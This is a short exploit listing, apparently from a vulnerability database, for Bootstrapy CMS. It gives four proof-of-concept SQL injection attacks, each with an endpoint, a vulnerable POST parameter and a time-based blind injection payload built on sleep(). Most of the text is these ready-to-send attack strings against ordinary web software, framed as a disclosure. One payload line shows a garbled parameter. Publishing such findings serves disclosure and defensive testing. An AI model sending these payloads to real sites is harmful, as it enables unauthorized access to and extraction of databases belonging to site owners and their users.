bootstrapy cms multiple sql injection
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability
# Exploit Title: Bootstrapy CMS - Multiple SQL Injection # Date: 21.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: http://bootstrapy.com # Demo Site: http://bootstrapy.net/demo/ # Version: Lastest # Tested on: Kali Linux # CVE: N/A ----- PoC 1: SQLi ----- Request: http://localhost/[PATH]/modules/forums/forum-thread.php Vulnerable Parameter: thread_id (POST) Attack Patten: search=&thread_id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z ----- PoC 2: SQLi ----- Request: http://localhost/[PATH]/modules/pages/contact-submit.php Vulnerable Parameter: subject (POST) Attack Pattern: email=sample%40email.tst&message=20&name=wUmrLVWz&subject=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&submit= ----- PoC 3 - SQLi ----- Request: http://localhost/[PATH]/modules/forums/post-new-submit.php Vulnerable Parameter: post-id Attack Pattern: body=1&post-id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z"e=1&submit=&thread-id=1 ----- PoC 4 - SQLi ----- Request: http://localhost/[PATH]/modules/forums/post-new-submit.php Vulnerable Parameter: thread-id (POST) Attack Pattern: quote=0&reply=1&submit=&thread-id=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z
Bootstrapy cms multiple sql injection Vulnerability / Exploit Source : Bootstrapy cms multiple sql injection